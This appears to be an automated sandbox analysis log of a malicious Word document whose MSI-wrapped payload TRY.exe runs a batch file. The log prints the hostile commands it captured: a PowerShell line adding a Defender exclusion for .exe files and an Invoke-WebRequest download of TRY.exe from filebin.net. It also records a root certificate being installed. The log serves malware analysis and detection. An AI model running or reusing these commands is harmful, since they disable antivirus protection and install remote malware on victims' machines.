Source: C:\Windows\System32\msiexec.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\SysWOW64\icacls.exeConsole Write: .................................3:.....(.P.....................<...............................................................................
Source: C:\Windows\SysWOW64\icacls.exeConsole Write: .................................3:.....(.P.....................<.......................................................v.......................
Source: C:\Windows\System32\cmd.exeConsole Write: ...................J....................................@c!J..... .......#...............(:w.......J....."..............T.......q(.w............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#.................r...............r.......m.....`Io.......bw.....................Kv.....................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............V.yk......w...............S.............}.dw.... .w.....0.~...............Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............6.yk......Z...............S.............}.dw......w.....0.~.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............V.yk......w...............S.............}.dw.... .w.....0.~...............Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............6.yk......................S.............}.dw......w.....0.~.....................|.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............V.yk....8.w...............S.............}.dw......w.....0.~...............Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.S.............}.dw......w.....0.~.............H.Z.....".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............V.yk......w...............S.............}.dw......w.....0.~...............Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............6.yk......Z...............S.............}.dw....0.w.....0.~.....................b.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............V.yk......w...............S.............}.dw....h.w.....0.~...............Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............6.yk......Z...............S.............}.dw....0.w.....0.~.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............V.yk......w...............S.............}.dw....h.w.....0.~...............Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.dw......w.....0.~.............H.Z.....2.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............V.yk....P.w...............S.............}.dw......w.....0.~...............Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w...............6.yk......Z...............S.............}.dw......w.....0.~.....................l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w...............V.yk......w...............S.............}.dw....H.w.....0.~...............Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......6.yk......Z...............S.............}.dw......w.....0.~.............H.Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................V.yk......w...............S.............}.dw......w.....0.~...............Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#.................j...............j.......e.....`Ig.......bw.....................Kn.....................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............6.ok......t.............................}.dw......t.....0.................L.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.................ok......L.............................}.dw....`.t.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............6.ok......t.............................}.dw......t.....0.................L.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.................ok......L.............................}.dw......t.....0.......................~.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............6.ok......t.............................}.dw....8.t.....0.................L.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.8...............}.dw....H.t.....0...............h.L.....".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............6.ok......t.............................}.dw......t.....0.................L.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S.................ok......L.............................}.dw....H.t.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............6.ok......t.............................}.dw......t.....0.................L.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.......T.R.Y...e.x.e.....L.............................}.dw....0.t.....0...............h.L.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............6.ok......t.............................}.dw....h.t.....0.................L.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k.................ok......L.............................}.dw....0.t.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............6.ok......t.............................}.dw....h.t.....0.................L.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w....... . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.......t.....0...............h.L.....4.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w...............6.ok....P.t.............................}.dw......t.....0.................L.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................ok......L.............................}.dw......t.....0.......................l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................6.ok......t.............................}.dw....H.t.....0.................L.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .........ok......L.............................}.dw......t.....0...............h.L.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................6.ok......t.............................}.dw......t.....0.................L.............................
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A7515E85DB42A85129F32A151C15AD96
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe"
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeProcess created: C:\Windows\System32\cmd.exe cmd /c thai.bat
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Set-MpPreference -ExclusionExtension ".exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe"
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A7515E85DB42A85129F32A151C15AD96
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe"
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeProcess created: C:\Windows\System32\cmd.exe cmd /c thai.bat
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Set-MpPreference -ExclusionExtension ".exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe"
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB61B44 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,
Source: 12543_0008858249_FWDOUTSTANDING_20200604.docOLE indicator, Word Document stream: true
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$543_0008858249_FWDOUTSTANDING_20200604.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR582D.tmpJump to behavior
Source: classification engineClassification label: mal76.expl.winDOC@19/23@5/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB665B0 GetCurrentDirectoryA,SetCurrentDirectoryA,GetLastError,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,GetLastError,FormatMessageA,SetCurrentDirectoryA,
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB64478 CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,GetLastError,FormatMessageA,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB65940 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,#20,#22,#23,FreeResource,SendMessageA,
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeProcess created: C:\Windows\System32\cmd.exe cmd /c thai.bat
Source: C:\Windows\SysWOW64\msiexec.exeFile written: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\msiwrapper.iniJump to behavior
Source: 12543_0008858249_FWDOUTSTANDING_20200604.docOLE document summary: title field not present or empty
Source: 12543_0008858249_FWDOUTSTANDING_20200604.docOLE document summary: author field not present or empty
Source: 12543_0008858249_FWDOUTSTANDING_20200604.docOLE document summary: edited time not present or 0
Source: ~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp.0.drOLE document summary: author field not present or empty
Source: ~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp.0.drOLE document summary: edited time not present or 0
Source: ~DFC2FF7A9553E7F48E.TMP.0.drOLE document summary: title field not present or empty
Source: ~DFC2FF7A9553E7F48E.TMP.0.drOLE document summary: author field not present or empty
Source: ~DFC2FF7A9553E7F48E.TMP.0.drOLE document summary: edited time not present or 0
Source: MSI5B5A.tmp.2.drOLE document summary: edited time not present or 0
Source: 535fae.ipi.2.drOLE document summary: title field not present or empty
Source: 535fae.ipi.2.drOLE document summary: author field not present or empty
Source: 535fae.ipi.2.drOLE document summary: edited time not present or 0
Source: C:\Windows\System32\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: MSI5B5A.tmp.2.drInitial sample: OLE summary template = Intel;1033
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wextract.pdb source: TRY.exe, 00000009.00000000.925012433.000000013FB69000.00000002.00000001.01000000.00000005.sdmp, TRY.exe, 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp, 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.dr, MSI5B5A.tmp.2.dr, files.cab.4.dr
Source: Binary string: wextract.pdbGCTL source: TRY.exe, 00000009.00000000.925012433.000000013FB69000.00000002.00000001.01000000.00000005.sdmp, TRY.exe, 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp, 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.dr, MSI5B5A.tmp.2.dr, files.cab.4.dr
Source: Binary string: C:\ss2\Projects\MsiWrapper\MsiCustomActions\Release\MsiCustomActions.pdb source: MSI5B5A.tmp.2.dr, MSI9F1.tmp.2.dr
Source: MSI5B5A.tmp.2.drInitial sample: OLE summary keywords = Installer
Source: MSI5B5A.tmp.2.drInitial sample: OLE summary subject = Internet Explorer - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com
Source: ~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp.0.drInitial sample: OLE indicators vbamacros = False
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB61C38 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,
Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9F1.tmpJump to dropped file
Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\$dpx$.tmp\79bd875a22ddb24abfa2594fbd40eccf.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9F1.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB615F8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,
Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Windows\Logs\DPX\setupact.logJump to behavior
Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Windows\Logs\DPX\setuperr.logJump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
Source: C:\Windows\System32\msiexec.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\System32\msiexec.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
